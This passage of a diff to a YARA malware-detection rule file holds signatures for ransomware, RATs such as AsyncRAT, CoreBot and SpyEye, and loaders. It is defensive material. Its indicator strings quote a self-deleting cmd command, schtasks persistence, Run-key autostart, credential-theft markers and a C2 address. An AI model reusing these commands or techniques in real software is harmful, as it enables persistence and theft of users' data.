"C:\\Windows\\System32\\dllhost.exe" fullword ascii + $v2_2 = "C:\\Windows\\SysWOW64\\dllhost.exe" fullword ascii + $v2_3 = "C:\\Users\\Public\\go" fullword ascii + $v2_4 = ":%:*:/:>:C:H:W:\\:a:p:u:z:" fullword ascii + $v2_5 = ": :%:*:9:>:C:R:W:\\:k:p:u:" fullword ascii + $v2_6 = ":*:/:4:C:H:M:\\:a:f:u:z:" fullword ascii condition: - uint16(0)==0x5a4d and ( all of ($s*) or (1 of ($pdb*) and 1 of ($s*))) + uint16(0)==0x5a4d and 3 of ($v1*) or 5 of ($v2*) } import "pe" -rule DITEKSHEN_MALWARE_Win_Browsergrabber : FILE +rule DITEKSHEN_MALWARE_Win_Cybergate : FILE { meta: - description = "Hunt for FOXGRABBER-like samples but for various browsers" + description = "Detects CyberGate/Spyrat/Rebhip RTA" author = "ditekSHen" - id = "a50a60cf-5ab8-5e4e-be00-aa0306f4d84f" - date = "2024-09-06" - modified = "2024-09-06" + id = "3b50ccfb-6603-5002-8ceb-e9252d4c7dff" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L5892-L5906" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "c96a63566280758d8c32542bfab3c6faa7d21329430345f51ea4c2f0a6809dc2" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L4008-L4026" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "b4a3c07533c2b251e1a714b28fb0b654c76881fb6ce970f6586c5908ee65609b" score = 75 - quality = 25 + quality = 46 tags = "FILE" strings: - $s1 = "start grabbing" wide - $s2 = "end grabbing in" wide - $s3 = "error of copying files from comp:" wide - $s4 = /(Chrome|Edge)/ wide - $ff = "\\Firefox\\" wide nocase - $pdb1 = "\\obj\\Debug\\grab" ascii - $pdb2 = "\\obj\\Release\\grab" ascii + $s1 = "UnitInjectLibrary" ascii + $s2 = "TLoader" fullword ascii + $s3 = "\\\\.\\SyserDbgMsg" fullword ascii + $s4 = "\\\\.\\SyserBoot" fullword ascii + $s5 = "\\signons" ascii + $s6 = "####@####" ascii + $s7 = "XX-XX-XX-XX" fullword ascii + $s8 = "EditSvr" ascii + $s9 = "_x_X_PASSWORDLIST_X_x_" fullword ascii + $s10 = "L$_RasDefaultCredentials#0" fullword ascii + $s11 = "password" nocase ascii condition: - uint16(0)==0x5a4d and not ($ff) and ( all of ($s*) or (1 of ($pdb*) and 1 of ($s*))) + uint16(0)==0x5a4d and 8 of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Deathransom : FILE +rule DITEKSHEN_MALWARE_Win_WSHRATJS : FILE { meta: - description = "Detects known DeathRansom ransomware" + description = "Detects WSHRAT JS variants" author = "ditekSHen" - id = "a6eeb607-8b5c-5982-8b5a-aa2b3c6a65e6" - date = "2024-09-06" - modified = "2024-09-06" + id = "7dbaea67-48dc-5fb8-ba58-b0d6eeca207b" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L5908-L5925" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "3c87364a7ecc403262056eeccaa16bf230fbbe684e21d35099d0d572abba9eda" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L4028-L4045" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "9956ed4613ac403360ab0222a7ed62350fcd998710843bd6700717f8bbb5052e" score = 75 quality = 75 tags = "FILE" strings: - $s1 = "%s %f %c" fullword ascii - $pdb1 = ":\\wud.pdb" ascii - $spdb2 = "\\crypt_server\\runtime\\crypt" ascii - $spdb3 = "\\bin\\nuvin.pdb" ascii - $h1 = "#Dunubeyokunov" wide - $h2 = "^Neyot dehipijakeyelih" wide - $h3 = "talin%Sanovurenofibiw" wide - $h4 = "WriteFile" fullword ascii - $h5 = "ClearEventLogA" fullword ascii - $h6 = "Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0" ascii wide + $charset_full = "us-ascii" nocase ascii + $charset_begin = "\"us-\"" nocase ascii + $charset_end = "Array(97,115,99,105,105)" nocase ascii + $wsc_object1 = "WScript.CreateObject(\"System.Text.UTF8Encoding" nocase ascii + $wsc_object2 = "WScript.CreateObject(\"Adodb.Stream" nocase ascii + $wsc_object3 = "WScript.CreateObject(\"Microsoft.XmlDom" nocase ascii + $s1 = "function(){return" ascii + $s2 = "}catch(err){" ascii + $s3 = "{item: \"bin.base64\"}" nocase ascii + $s4 = "* 1].item =" ascii condition: - uint16(0)==0x5a4d and ( all of ($pdb*) or ( all of ($s*) and 1 of ($pdb*)) or 5 of ($h*)) + filesize <400KB and ($charset_full or ($charset_begin and $charset_end)) and 2 of ($wsc_object*) and 3 of ($s*) } import "pe" -rule DITEKSHEN_MALWARE_Win_Unlockyourfiles : FILE +rule DITEKSHEN_MALWARE_Win_Asyncrat : FILE { meta: - description = "Detects UnlockYourFiles ransomware" + description = "Detects AsyncRAT" author = "ditekSHen" - id = "265f2a48-143a-56c9-9cd4-b5137799a9e8" - date = "2024-09-06" - modified = "2024-09-06" + id = "6465b50d-8f1a-5c09-84fd-cd1e5994e68f" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L5927-L5946" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "05f549467fac03d4aa2248a9c6c87e4c4273ed6ad727ebb77a4dd115032e454b" - score = 75 - quality = 75 + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L4047-L4074" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "073d4a8667fb1a48bf2bd503a551d7f78e38a6066feedc646d92c27fb7201fca" + score = 60 + quality = 35 tags = "FILE" strings: - $s1 = "filesx0" wide - $s2 = "_auto_file" wide - $s3 = "<EncyptedKey>" fullword wide - $s4 = "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\" wide - $s5 = "DecryptAllFile" fullword ascii - $s6 = "AES_Only_Decrypt_File" fullword ascii - $m1 = "Free files decrypted" wide - $m2 = "Restore my files" wide - $m3 = "Type tour password..." wide - $m4 = "files encrypted by strong password" ascii - $m5 = "buy bitcoin" ascii - $m6 = "Unlock File" fullword wide + $x1 = "AsyncRAT" fullword ascii + $x2 = "AsyncRAT 0." wide + $x3 = /AsyncRAT\s[0-9]\.[0-9]\.[0-9][A-Z]/ fullword wide + $s1 = "/create /sc onlogon /rl highest /tn" fullword wide + $s2 = "/C choice /C Y /N /D Y /T 1 & Del \"" fullword wide + $s3 = "{{ ProcessId = {0}, Name = {1}, ExecutablePath = {2} }}" fullword wide + $s4 = "Stub.exe" fullword ascii wide + $s5 = "\\nuR\\noisreVtnerruC\\swodniW\\tfosorciM\\erawtfoS\\UCKH" ascii wide + $s6 = "VirtualBox" fullword ascii wide + $s7 = "/target:winexe /platform:x86 /optimize+" fullword ascii wide + $s8 = "Win32_ComputerSystem" ascii wide + $s9 = "Win32_Process Where ParentProcessID=" ascii wide + $s10 = "etirWgeR.llehShsW" ascii wide + $s11 = "usbSpread" fullword ascii wide + $cnc1 = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0" fullword ascii wide + $cnc2 = "Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1" fullword ascii wide + $cnc3 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" fullword ascii wide + $cnc4 = "POST / HTTP/1.1" fullword ascii wide condition: - uint16(0)==0x5a4d and (4 of ($s*) or 5 of ($m*) or (2 of ($s*) and 2 of ($m*))) + (( uint16(0)==0x5a4d and filesize <4000KB) and (1 of ($x*) or 6 of ($s*) or all of ($cnc*) or (4 of ($s*) and 2 of ($cnc*)))) or (1 of ($x*) or 6 of ($s*) or all of ($cnc*) or (4 of ($s*) and 2 of ($cnc*))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Decryptmyfiles : FILE +rule DITEKSHEN_MALWARE_Win_Quilclipper { meta: - description = "Detects DecryptMyFiles ransomware" + description = "Detects QuilClipper variants mostly in memory or extracted AutoIt script" author = "ditekSHen" - id = "dab518f2-3fac-5492-88fb-35cd0000ec47" - date = "2024-09-06" - modified = "2024-09-06" + id = "bd23ec5a-f21a-5133-a77a-de2615933b82" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L5948-L5964" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "5b7f74569700e2ad3f31388571dad5ffda45f5ab3dd36806f7514aff0367d5ba" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L4076-L4094" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "dcac93806a438b188ae70a679301cb6630b9eb6849bf8fbbb1cea5fed5e7cf75" score = 75 - quality = 73 - tags = "FILE" + quality = 75 + tags = "" strings: - $s1 = "FILES ENCRYPTED" wide - $s2 = "pexplorer.exe" fullword wide - $s3 = "uniquesession" fullword ascii - $s4 = ".[decryptmyfiles.top]." fullword ascii - $s5 = "decrypt 1 file" ascii - $s6 = "(databases,backups, large excel" ascii - $c1 = "api/connect.php" ascii - $c2 = "decryptmyfiles.top" ascii - $c3 = "/contact/" ascii + $cnc1 = "QUILCLIPPER by" ascii + $cnc2 = "/ UserName:" ascii + $cnc3 = "/ System:" ascii + $s1 = "DLLCALL ( \"kernel32.dll\" , \"handle\" , \"CreateMutexW\" , \"struct*\"" ascii + $s2 = "SHELLEXECUTE ( @SCRIPTFULLPATH , \"\" , \"\" , FUNC_" ascii + $s3 = "CASE BITROTATE" ascii + $s4 = "CASE BITXOR" ascii + $s5 = "CLIP( FUNC_" ascii + $s6 = "CLIPPUT (" ascii + $s7 = "FUNC _CLIPPUTFILE(" ascii + $s8 = "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Schedule" ascii condition: - uint16(0)==0x5a4d and (4 of ($s*) or all of ($c*) or (2 of ($c*) and 2 of ($s*))) + all of ($cnc*) or all of ($s*) } import "pe" -rule DITEKSHEN_MALWARE_Win_Motocos : FILE +rule DITEKSHEN_MALWARE_Win_Spyeye : FILE { meta: - description = "Detects Motocos ransomware" + description = "Detects SpyEye" author = "ditekSHen" - id = "be7284be-b57d-5a2c-9a84-37d76445cd0d" - date = "2024-09-06" - modified = "2024-09-06" + id = "aa15220a-6fd4-5c5e-8287-957fc3c3fe52" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L5966-L5981" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "99ac365c277058503874313e3a74ab016d6d279b47c754c3df950e3ce60e29f1" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L4096-L4111" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "352853d600d1f4fbc09e58b783eb4e13b335fefbfe89842873710f0a9085d107" score = 75 quality = 75 tags = "FILE" strings: - $s1 = "Block Investigation Tools" wide - $s2 = "powershell.exe,taskmgr.exe,procexp.exe,procmon.exe" wide - $s3 = "google.com,youtube.com,baidu.com,facebook.com,amazon.com,360.cn,yahoo.com,wikipedia.org,zoom.us,live.com,reddit.com,netflix.com,microsoft.com,instagram.com,vk.com," wide - $s4 = "START ----" wide - $s5 = "TEngine.Clear_EventLog_Result" wide - $s6 = "TEngine.EncryptLockFiles" wide - $s7 = "TEngine.CleanShadowFiles" wide - $s8 = "TDNSUtils.SendCommand" wide + $x1 = "_CLEANSWEEP_" ascii wide + $x2 = "config.datUT" fullword ascii + $x3 = "webinjects.txtUT" fullword ascii + $s1 = "confirm:processCommand" fullword ascii + $s2 = "Smth wrong with navigate to REF-PAGE (err code: %d). 0_o" fullword ascii + $s3 = "(UTC%s%2.2f) %s" fullword wide + $s4 = "M\\F;u`r" fullword ascii + $s5 = "]YH0%Yn" fullword ascii condition: - uint16(0)==0x5a4d and 4 of them + uint16(0)==0x5a4d and (2 of ($x*) or (1 of ($x*) and 1 of ($s*))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Dlagent12 : FILE +rule DITEKSHEN_MALWARE_Win_Renamer : FILE { meta: - description = "Detects downloader agent" + description = "Detects Renamer/Tainp variants" author = "ditekSHen" - id = "841b998b-99d1-50d8-bc7b-75b2a8e690bf" - date = "2024-09-06" - modified = "2024-09-06" + id = "9e701bbe-d698-510a-b63d-3c1575dac7b0" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L5983-L5993" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "b9845414f4ce4cc25b75a8de7569c4135bbb7ba9098fd4c50d7ac80302e99b8f" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L4114-L4135" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "df80657631f072bc1627e1cf503881a2c065396f8798d7f347259672f600198d" score = 75 quality = 75 tags = "FILE" strings: - $s1 = "WebClient" fullword ascii - $s2 = "DownloadData" fullword ascii - $s3 = "packet_server" fullword wide + $s1 = "shell\\open\\command=" fullword wide + $s2 = "icon=%SystemRoot%\\system32\\SHELL32.dll,4" fullword wide + $s3 = "DropTarget" ascii + $s4 = "C:\\Windows\\Paint" fullword wide + $s5 = "hold.inf" fullword wide + $s6 = "Dropped" ascii condition: - uint16(0)==0x5a4d and all of them and filesize <50KB + uint16(0)==0x5a4d and all of ($s*) or (4 of ($s*) and for any directory in pe.data_directories : (directory.virtual_address!=0 and directory.size==0)) } import "pe" -rule DITEKSHEN_MALWARE_Win_Dlinjector01 : FILE +rule DITEKSHEN_MALWARE_Win_Epsilon : FILE { meta: - description = "Detects specific downloader injector shellcode" + description = "Detects Epsilon ransomware" author = "ditekSHen" - id = "c5e0946c-3e15-5ebc-b1b5-3f00566dc5cd" - date = "2024-09-06" - modified = "2024-09-06" + id = "c5561a0d-85ac-5137-a97e-310aa03eb787" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L5995-L6015" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "5c13af5fdbb2e8a27103d9502126a82d0bff15d9a269b22e4279b5b459d50e2d" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L4137-L4169" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "cc4481ddb6f5fd52a0bc901dde4c34ccf79024cd68605245df0dcbea22d0adee" score = 75 quality = 75 tags = "FILE" strings: - $s1 = "process call create \"%s\"" ascii wide - $s2 = "\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\" ascii wide - $s3 = "%systemroot%\\system32\\ntdll.dll" ascii wide - $s4 = "qemu-ga.exe" ascii wide - $s5 = "prl_tools.exe" ascii wide - $s6 = "vboxservice.exe" ascii wide - $o1 = { 75 04 74 02 38 6e 8b 34 24 83 c4 04 eb 0a 08 81 } - $o2 = { 16 f8 f7 ba f0 3d 87 c7 95 13 b7 64 22 be e1 59 } - $o3 = { 8b 0c 24 83 c4 04 eb 05 ea f2 eb ef 05 e8 ad fe } - $o4 = { eb 05 1d 51 eb f5 ce e8 80 fd ff ff 77 a1 f4 cd } - $o5 = { eb 05 6e 33 eb f5 73 e8 64 f6 ff ff 77 a1 f4 77 } - $o6 = { 59 eb 05 fd 98 eb f4 50 e8 d5 f5 ff ff 3b b9 00 } - $o7 = "bYkoDA7G" fullword ascii + $s1 = ".Speak \"" wide + $s2 = "chkUpdateRegistry" fullword wide + $s3 = "/C choice /C Y /N /D Y /T 1 & Del \"" fullword wide + $s4 = "CreateObject(\"sapi.spvoice\")" fullword wide + $s5 = "READ_ME.hta" wide + $s6 = "WScript.Sleep(" wide + $s7 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" fullword wide + $s8 = "<div class='bold'>Files are encrypted* but not deleted.</div>" ascii + $e1 = { 72 00 75 00 6e 00 64 00 6c 00 6c 00 2e 00 65 00 + 78 00 65 00 00 09 2e 00 74 00 78 00 74 00 00 09 + 2e 00 64 00 6f 00 63 00 00 0b 2e 00 64 00 6f 00 + 63 00 78 00 00 09 2e 00 78 00 6c 00 73 00 00 0d + 2e 00 69 00 6e 00 64 00 65 00 78 00 00 09 2e 00 + 70 00 64 00 66 00 00 09 2e 00 7a 00 69 00 70 00 + 00 09 2e 00 72 00 61 00 72 00 00 09 2e 00 63 00 + 73 00 73 00 00 09 2e 00 6c 00 6e 00 6b 00 00 0b + 2e 00 78 00 6c 00 73 00 78 00 00 09 2e 00 70 00 + 70 00 74 00 00 0b 2e 00 70 00 70 00 74 00 78 00 + 00 09 2e 00 6f 00 64 00 } + $e2 = { 68 00 74 00 6d 00 00 07 2e 00 6d 00 6c 00 00 07 + 43 00 3a 00 5c 00 00 07 44 00 3a 00 5c 00 00 07 + 45 00 3a 00 5c 00 00 07 46 00 3a 00 5c 00 00 07 + 47 00 3a 00 5c 00 00 07 5a 00 3a 00 5c 00 00 07 + 41 00 3a 00 5c 00 00 0f 63 00 6d 00 64 00 2e 00 + 65 00 78 00 65 } condition: - ( uint16(0)==0x5a4d and all of ($o*)) or ( all of ($s*)) + uint16(0)==0x5a4d and (6 of ($s*) or ( all of ($e*) and 4 of ($s*))) } import "pe" -rule DITEKSHEN_MALWARE_Win_Dlinjector02 : FILE +rule DITEKSHEN_MALWARE_Win_Corebot : FILE { meta: - description = "Detects downloader injector" + description = "Detects CoreBot" author = "ditekSHen" - id = "ce2c418d-18e4-579c-9828-94e294385846" - date = "2024-09-06" - modified = "2024-09-06" + id = "f0351bdb-34ff-5b6d-bc4b-61fc491401ef" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L6017-L6034" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "76d185cfcbc7f4996c2fb5c7c1ba4eb20b32d322d8ff47594283a4ca3e573a0b" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L4171-L4226" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "518209458fc8912d47b0b99896178fda823c3174c37f21d5e9331349a69322d7" score = 75 - quality = 75 + quality = 50 tags = "FILE" + snort_sid = "920211-920212" strings: - $x1 = "In$J$ct0r" fullword wide - $x2 = "%InJ%ector%" fullword wide - $a1 = "WriteProcessMemory" fullword wide - $a2 = "URLDownloadToFileA" fullword ascii - $a3 = "Wow64SetThreadContext" fullword wide - $a4 = "VirtualAllocEx" fullword wide - $s1 = "RunPE" fullword wide - $s2 = "SETTINGS" fullword wide - $s3 = "net.pipe" fullword wide - $s4 = "vsmacros" fullword wide + $f1 = "core.cert_fp" fullword ascii + $f2 = "core.crash_handler" fullword ascii + $f3 = "core.delay" fullword ascii + $f4 = "core.guid" fullword ascii + $f5 = "core.inject" fullword ascii + $f6 = "core.installed_file" fullword ascii + $f7 = "core.plugins_dir" fullword ascii + $f8 = "core.plugins_key" fullword ascii + $f9 = "core.safe_mode" fullword ascii + $f10 = "core.server" fullword ascii + $f11 = "core.servers" fullword ascii + $f12 = "core.test_env" fullword ascii + $f13 = "core.vm_detect" fullword ascii + $f14 = "core.vm_detect_skip" fullword ascii + $s1 = "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko" fullword wide + $s2 = "\\Microsoft\\Windows\\AppCache" wide + $s3 = "crash_flag" fullword wide + $s4 = "container.dat" fullword wide + $s5 = "INJECTED" fullword ascii + $s6 = "tmp.delete_file" fullword ascii + $x1 = "CoreBot v" wide + $x2 = "BotName" fullword ascii + $x3 = "RunBotKiller" fullword ascii + $x4 = "botv" fullword ascii + $x5 = "\\CoreBot\\CoreBot\\obj\\" ascii + $v1_1 = "newtask" fullword wide + $v1_2 = "drivers\\etc\\hosts" fullword wide + $v1_3 = "/C schtasks /create /tn \\" wide + $v1_4 = "/st 00:00 /du 9999:59 /sc once /ri 1 /f" wide + $v1_5 = "AntivirusInstalled" fullword ascii + $v1_6 = "payload" fullword ascii + $v1_7 = "DownloadFile" fullword ascii + $v1_8 = "RemoveFile" fullword ascii + $v1_9 = "AutoRunName" fullword ascii + $v1_10 = "EditHosts" fullword ascii + $v1_11 = /127\.0\.0\.1 (avast|mcafee|eset|avira|bitdefender|bullguard|safebrowse)\.com/ fullword wide + $cnc1 = "&os=" fullword wide + $cnc2 = "&pv=" fullword wide + $cnc3 = "&ip=" fullword wide + $cnc4 = "&cn=" fullword wide + $cnc5 = "&lr=" fullword wide + $cnc6 = "&ct=" fullword wide + $cnc7 = "&bv=" fullword wide + $cnc8 = "&op=" fullword wide + $cnc9 = "&td=" fullword wide + $cnc10 = "&uni=" fullword wide condition: - uint16(0)==0x5a4d and (1 of ($x*) or ( all of ($a*) and 3 of ($s*))) + uint16(0)==0x5a4d and (5 of ($f*) or all of ($s*) or (3 of ($s*) and 2 of ($f*)) or 3 of ($x*) or 8 of ($v1*) or (4 of ($cnc*) and 4 of ($v1*)) or 12 of them ) } import "pe" -rule DITEKSHEN_MALWARE_Win_Nermer : FILE +rule DITEKSHEN_MALWARE_Win_Dllloader : FILE { meta: - description = "Detects Nermer ransomware" + description = "Detects unknown DLL Loader" author = "ditekSHen" - id = "fce4f178-8e98-53b0-ae09-2ce876ad524e" - date = "2024-09-06" - modified = "2024-09-06" + id = "164967b8-d0f5-543d-82ac-bb2465b85c2a" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L6036-L6062" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "e885b1b908b256ee07f5cb144d63f5ad65e5bf746b70efe168b0ac742a246ab3" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L4228-L4239" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "aaf1ff0f93d1fe6cf189c9f30403c226e64146178150dff8dfd3a9e3ed84bcc2" score = 75 quality = 75 tags = "FILE" strings: - $x1 = "gPROTECT_INFO.TXT" fullword wide - $x2 = ".nermer" fullword wide - $s1 = "db_journal" fullword wide - $s2 = "quicken2015backup" fullword wide - $s3 = "mysql" fullword wide - $s4 = "sas7bdat" fullword wide - $s5 = "httpd.exe" fullword wide - $s6 = "Intuit.QuickBooks.FCS" fullword wide - $s7 = "convimage" fullword wide - $s8 = ".?AV?$_Binder@U_Unforced@std@@P8shares_t@" ascii - $s9 = "BgIAAACkAABSU0ExAAgAAAEAAQCt" ascii - $m1 = "YOUR FILES WERE ENCRYPTED" ascii - $m2 = "MARKED BY EXTENSION .nermer" ascii - $m3 = "send us your id: >> {id} <<" ascii - $m4 = "email us: >> {email} <<" ascii - $c1 = "/repeater.php" ascii - $c2 = "HTTPClient/0.1" fullword ascii - $c3 = "94.156.35.227" ascii - $c4 = "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" fullword ascii + $s1 = "LondLibruryA" fullword ascii + $s2 = "LdrLoadDll" fullword ascii + $s3 = "snxhk.dll" fullword ascii + $s4 = "DisableThreadLibraryCalls" fullword ascii condition: - uint16(0)==0x5a4d and ( all of ($m*) or all of ($c*) or all of ($s*) or (4 of ($s*) and (1 of ($x*) or 1 of ($m*) or 2 of ($c*))) or 14 of them ) + uint16(0)==0x5a4d and all of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Beastdoor : FILE +rule DITEKSHEN_MALWARE_Win_Farfli : FILE { meta: - description = "Detects Beastdoor backdoor" + description = "Detects Farfli backdoor" author = "ditekSHen" - id = "b271d53e-2693-5a93-825a-ef32f72a4b01" - date = "2024-09-06" - modified = "2024-09-06" + id = "4c3c86f4-5493-5e8a-9618-b0c3d55e2b86" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L6064-L6084" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "d9a72717d124bcf1e3b95850cd524e577abe96a094586a5555faadba78fcb9ad" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L4241-L4253" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "cb1856b32c66d6d070b8ec2d9feea25d6d6748057ceaa342be2ddc589f9a89d6" score = 75 - quality = 75 + quality = 50 tags = "FILE" strings: - $s1 = "shellx.pif" fullword ascii nocase - $s2 = "Beasty" fullword ascii - $s3 = "* Boot:[" ascii - $s4 = "^ Shut Down:[" ascii - $s5 = "set cdaudio door" ascii - $s6 = "This \"Portable Network Graphics\" image is not valid" wide - $n1 = ".aol.com" ascii - $n2 = "web.icq.com" ascii - $n3 = "&fromemail=" fullword ascii - $n4 = "&subject=" fullword ascii - $n5 = "&Send=" fullword ascii - $n6 = "POST /scripts/WWPMsg.dll HTTP/1.0" fullword ascii - $n7 = "mirabilis.com" ascii + $s1 = "%ProgramFiles%\\Google\\" fullword ascii + $s2 = "%s\\%d.bak" fullword ascii + $s3 = "%s Win7" fullword ascii + $s4 = "%s:%d:%s" fullword ascii + $s5 = "C:\\2.txt" fullword ascii condition: - uint16(0)==0x5a4d and ( all of ($s*) or 5 of ($n*) or (3 of ($s*) and 3 of ($n*))) + uint16(0)==0x5a4d and all of them } import "pe" -rule DITEKSHEN_MALWARE_Win_Gravityrat : FILE +rule DITEKSHEN_MALWARE_Win_Warezov : FILE { meta: - description = "Detects GravityRAT" + description = "Detects Warezov worm/downloader" author = "ditekSHen" - id = "cb581dd6-15b2-54ae-9f27-30ec21554fb9" - date = "2024-09-06" - modified = "2024-09-06" + id = "8cb1dcb1-981d-5ff2-b0d9-aa18dfbfc795" + date = "2024-09-23" + modified = "2024-09-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L6086-L6108" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "a6b049dbf21f22f751c15da98536e9ef2a4ced7755ade0cc9904afddef1d3ae6" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/malware.yar#L4255-L4269" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "e65922902fd18175a3ce7b600d46535e92b92240fa3ca83dced6f9ce14f3e815" score = 75 quality = 75 tags = "FILE" strings: - $s1 = "/GX/GX-Server.php?VALUE=2&Type=" wide - $s2 = "&SIGNATUREHASH=" wide - $s3 = "Error => CommonFunctionClass => Upload()" wide - $s4 = 